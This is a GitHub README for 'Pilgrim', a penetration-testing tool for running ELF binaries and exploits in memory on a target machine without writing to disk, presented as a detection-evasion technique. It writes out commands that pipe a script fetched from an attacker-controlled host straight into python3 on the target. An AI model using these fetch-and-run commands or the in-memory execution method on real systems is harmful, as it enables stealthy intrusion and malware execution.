Skip to content

Living Off the Land! Malware execution in memory using python and ELF binaries.

License

Notifications You must be signed in to change notification settings

diante0x7/Pilgrim

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Pilgrim - Exec in Memory

Pilgrim is a staged python tool used to execute ELF binaries in memory without ever affecting the hard drive!

Usage

It is best to host the pilgrim.py file in a directory alongside any ELF binaries and exploits that you plan to use during your engagement.

On your host machine, run the following:

python -m http-server

On the target machine, note the address of your system and run the following:

python3 <(curl http://<attacker-ip>:<port>/pilgrim.py)

or, using the official github version:

python3 <(curl https://raw.githubusercontent.com/diante0x7/Pilgrim/main/pilgrim.py)

It is wise to keep the http server open as long as necessary until you have completed execution of all of your payloads.

Presentation

Within the repository, there is a Pilgrim.pdf file explaining the process and techniques used in development of this tool! Use that if there are any issues understanding execution or for demos of my Proof of Concept!

Outro

This is a simple project that recalls me back to a time where such a tool was not widely available and it was necessary for me to evade detection by using this method. The techniques used in Pilgrim can be expanded upon and adapted to fit any and every need in the penetration testing space with endless possibilities! Hopefully you learned something new from this, and if not I hope you approve of my style of presentation.

About

Living Off the Land! Malware execution in memory using python and ELF binaries.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages